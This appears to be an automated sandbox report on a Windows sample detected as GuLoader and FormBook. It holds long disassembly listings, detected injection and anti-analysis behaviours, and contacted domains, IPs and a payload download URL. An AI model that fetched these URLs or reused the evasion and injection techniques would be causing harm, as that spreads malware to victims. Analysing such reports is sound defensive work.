Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FFEC0 mov eax, dword ptr fs:[00000030h] 36_2_1E1FFEC0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E188EC7 mov eax, dword ptr fs:[00000030h] 36_2_1E188EC7
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1716E0 mov ecx, dword ptr fs:[00000030h] 36_2_1E1716E0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218ED6 mov eax, dword ptr fs:[00000030h] 36_2_1E218ED6
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1576E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1576E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16F716 mov eax, dword ptr fs:[00000030h] 36_2_1E16F716
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DFF10 mov eax, dword ptr fs:[00000030h] 36_2_1E1DFF10
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DFF10 mov eax, dword ptr fs:[00000030h] 36_2_1E1DFF10
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A70E mov eax, dword ptr fs:[00000030h] 36_2_1E17A70E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A70E mov eax, dword ptr fs:[00000030h] 36_2_1E17A70E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17E730 mov eax, dword ptr fs:[00000030h] 36_2_1E17E730
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21070D mov eax, dword ptr fs:[00000030h] 36_2_1E21070D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21070D mov eax, dword ptr fs:[00000030h] 36_2_1E21070D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E144F2E mov eax, dword ptr fs:[00000030h] 36_2_1E144F2E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E144F2E mov eax, dword ptr fs:[00000030h] 36_2_1E144F2E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E20131B mov eax, dword ptr fs:[00000030h] 36_2_1E20131B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218F6A mov eax, dword ptr fs:[00000030h] 36_2_1E218F6A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14F358 mov eax, dword ptr fs:[00000030h] 36_2_1E14F358
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14DB40 mov eax, dword ptr fs:[00000030h] 36_2_1E14DB40
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15EF40 mov eax, dword ptr fs:[00000030h] 36_2_1E15EF40
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E173B7A mov eax, dword ptr fs:[00000030h] 36_2_1E173B7A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E173B7A mov eax, dword ptr fs:[00000030h] 36_2_1E173B7A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14DB60 mov ecx, dword ptr fs:[00000030h] 36_2_1E14DB60
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15FF60 mov eax, dword ptr fs:[00000030h] 36_2_1E15FF60
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218B58 mov eax, dword ptr fs:[00000030h] 36_2_1E218B58
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E158794 mov eax, dword ptr fs:[00000030h] 36_2_1E158794
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E215BA5 mov eax, dword ptr fs:[00000030h] 36_2_1E215BA5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17B390 mov eax, dword ptr fs:[00000030h] 36_2_1E17B390
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7794
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7794
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7794 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7794
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E151B8F mov eax, dword ptr fs:[00000030h] 36_2_1E151B8F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E151B8F mov eax, dword ptr fs:[00000030h] 36_2_1E151B8F
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1FD380 mov ecx, dword ptr fs:[00000030h] 36_2_1E1FD380
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E20138A mov eax, dword ptr fs:[00000030h] 36_2_1E20138A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1837F5 mov eax, dword ptr fs:[00000030h] 36_2_1E1837F5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1703E2 mov eax, dword ptr fs:[00000030h] 36_2_1E1703E2
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7016
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7016
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C7016 mov eax, dword ptr fs:[00000030h] 36_2_1E1C7016
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h] 36_2_1E1C6C0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h] 36_2_1E1C6C0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h] 36_2_1E1C6C0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6C0A mov eax, dword ptr fs:[00000030h] 36_2_1E1C6C0A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E201C06 mov eax, dword ptr fs:[00000030h] 36_2_1E201C06
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h] 36_2_1E21740D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h] 36_2_1E21740D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E21740D mov eax, dword ptr fs:[00000030h] 36_2_1E21740D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E214015 mov eax, dword ptr fs:[00000030h] 36_2_1E214015
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E214015 mov eax, dword ptr fs:[00000030h] 36_2_1E214015
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17002D mov eax, dword ptr fs:[00000030h] 36_2_1E17002D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17BC2C mov eax, dword ptr fs:[00000030h] 36_2_1E17BC2C
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h] 36_2_1E15B02A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h] 36_2_1E15B02A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h] 36_2_1E15B02A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15B02A mov eax, dword ptr fs:[00000030h] 36_2_1E15B02A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E160050 mov eax, dword ptr fs:[00000030h] 36_2_1E160050
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E160050 mov eax, dword ptr fs:[00000030h] 36_2_1E160050
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DC450 mov eax, dword ptr fs:[00000030h] 36_2_1E1DC450
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DC450 mov eax, dword ptr fs:[00000030h] 36_2_1E1DC450
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E202073 mov eax, dword ptr fs:[00000030h] 36_2_1E202073
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E211074 mov eax, dword ptr fs:[00000030h] 36_2_1E211074
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A44B mov eax, dword ptr fs:[00000030h] 36_2_1E17A44B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16746D mov eax, dword ptr fs:[00000030h] 36_2_1E16746D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15849B mov eax, dword ptr fs:[00000030h] 36_2_1E15849B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149080 mov eax, dword ptr fs:[00000030h] 36_2_1E149080
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C3884 mov eax, dword ptr fs:[00000030h] 36_2_1E1C3884
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C3884 mov eax, dword ptr fs:[00000030h] 36_2_1E1C3884
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17F0BF mov ecx, dword ptr fs:[00000030h] 36_2_1E17F0BF
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17F0BF mov eax, dword ptr fs:[00000030h] 36_2_1E17F0BF
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17F0BF mov eax, dword ptr fs:[00000030h] 36_2_1E17F0BF
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1890AF mov eax, dword ptr fs:[00000030h] 36_2_1E1890AF
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov ecx, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1DB8D0 mov eax, dword ptr fs:[00000030h] 36_2_1E1DB8D0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E2014FB mov eax, dword ptr fs:[00000030h] 36_2_1E2014FB
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h] 36_2_1E1C6CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h] 36_2_1E1C6CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C6CF0 mov eax, dword ptr fs:[00000030h] 36_2_1E1C6CF0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218CD6 mov eax, dword ptr fs:[00000030h] 36_2_1E218CD6
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h] 36_2_1E149100
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h] 36_2_1E149100
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E149100 mov eax, dword ptr fs:[00000030h] 36_2_1E149100
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E218D34 mov eax, dword ptr fs:[00000030h] 36_2_1E218D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E153D34 mov eax, dword ptr fs:[00000030h] 36_2_1E153D34
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14AD30 mov eax, dword ptr fs:[00000030h] 36_2_1E14AD30
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1CA537 mov eax, dword ptr fs:[00000030h] 36_2_1E1CA537
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h] 36_2_1E174D3B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h] 36_2_1E174D3B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E174D3B mov eax, dword ptr fs:[00000030h] 36_2_1E174D3B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17513A mov eax, dword ptr fs:[00000030h] 36_2_1E17513A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17513A mov eax, dword ptr fs:[00000030h] 36_2_1E17513A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov eax, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E164120 mov ecx, dword ptr fs:[00000030h] 36_2_1E164120
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E167D50 mov eax, dword ptr fs:[00000030h] 36_2_1E167D50
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16B944 mov eax, dword ptr fs:[00000030h] 36_2_1E16B944
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16B944 mov eax, dword ptr fs:[00000030h] 36_2_1E16B944
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E183D43 mov eax, dword ptr fs:[00000030h] 36_2_1E183D43
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C3540 mov eax, dword ptr fs:[00000030h] 36_2_1E1C3540
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16C577 mov eax, dword ptr fs:[00000030h] 36_2_1E16C577
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16C577 mov eax, dword ptr fs:[00000030h] 36_2_1E16C577
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B171 mov eax, dword ptr fs:[00000030h] 36_2_1E14B171
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B171 mov eax, dword ptr fs:[00000030h] 36_2_1E14B171
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14C962 mov eax, dword ptr fs:[00000030h] 36_2_1E14C962
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17FD9B mov eax, dword ptr fs:[00000030h] 36_2_1E17FD9B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17FD9B mov eax, dword ptr fs:[00000030h] 36_2_1E17FD9B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E17A185 mov eax, dword ptr fs:[00000030h] 36_2_1E17A185
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E16C182 mov eax, dword ptr fs:[00000030h] 36_2_1E16C182
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E142D8A mov eax, dword ptr fs:[00000030h] 36_2_1E142D8A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h] 36_2_1E171DB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h] 36_2_1E171DB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E171DB5 mov eax, dword ptr fs:[00000030h] 36_2_1E171DB5
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1735A1 mov eax, dword ptr fs:[00000030h] 36_2_1E1735A1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1761A0 mov eax, dword ptr fs:[00000030h] 36_2_1E1761A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1761A0 mov eax, dword ptr fs:[00000030h] 36_2_1E1761A0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1C69A6 mov eax, dword ptr fs:[00000030h] 36_2_1E1C69A6
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1F8DF1 mov eax, dword ptr fs:[00000030h] 36_2_1E1F8DF1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h] 36_2_1E14B1E1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h] 36_2_1E14B1E1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E14B1E1 mov eax, dword ptr fs:[00000030h] 36_2_1E14B1E1
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E1D41E8 mov eax, dword ptr fs:[00000030h] 36_2_1E1D41E8
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15D5E0 mov eax, dword ptr fs:[00000030h] 36_2_1E15D5E0
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 36_2_1E15D5E0 mov eax, dword ptr fs:[00000030h] 36_2_1E15D5E0
Enables debug privileges
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Thread register set: target process: 3388 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe' Jump to behavior

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe Code function: 1_2_02242183 cpuid 1_2_02242183

Stealing of Sensitive Information:

barindex
GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Yara detected FormBook
Source: Yara match File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY
Yara detected Generic Dropper
Source: Yara match File source: Process Memory Space: ZGNX11JMSc.exe PID: 5880, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000024.00000002.1042748926.00000000009C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 448876 Sample: ZGNX11JMSc.exe Startdate: 14/07/2021 Architecture: WINDOWS Score: 100 14 www.stonalogov.com 2->14 16 www.gentrypartyof8.com 2->16 18 6 other IPs or domains 2->18 22 Found malware configuration 2->22 24 Malicious sample detected (through community Yara rule) 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 8 other signatures 2->28 7 ZGNX11JMSc.exe 1 2->7         started        signatures3 process4 signatures5 30 Contains functionality to detect hardware virtualization (CPUID execution measurement) 7->30 32 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 7->32 34 Tries to detect Any.run 7->34 36 2 other signatures 7->36 10 ZGNX11JMSc.exe 6 7->10         started        process6 dnsIp7 20 ceattire.com 185.211.56.131, 49752, 80 SERVERIR Iran (ISLAMIC Republic Of) 10->20 38 Modifies the context of a thread in another process (thread injection) 10->38 40 Tries to detect Any.run 10->40 42 Maps a DLL or memory area into another process 10->42 44 Hides threads from debuggers 10->44 signatures8
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.211.56.131
 ceattire.com Iran (ISLAMIC Republic Of)
39368 SERVERIR true

Contacted Domains

Name IP Active
www.dating-web.site 64.190.62.111 true
ceattire.com 185.211.56.131 true
137gate.com 31.44.185.28 true
gentrypartyof8.com 66.235.200.146 true
www.gentrypartyof8.com unknown unknown
www.automotivevita.com unknown unknown
www.bloomandbrewcafe.com unknown unknown
www.stonalogov.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://ceattire.com/bin_UYDMbHwI28.bin true
  • Avira URL Cloud: safe
 unknown
www.yellow-wink.com/nff/ true
  • Avira URL Cloud: safe
 low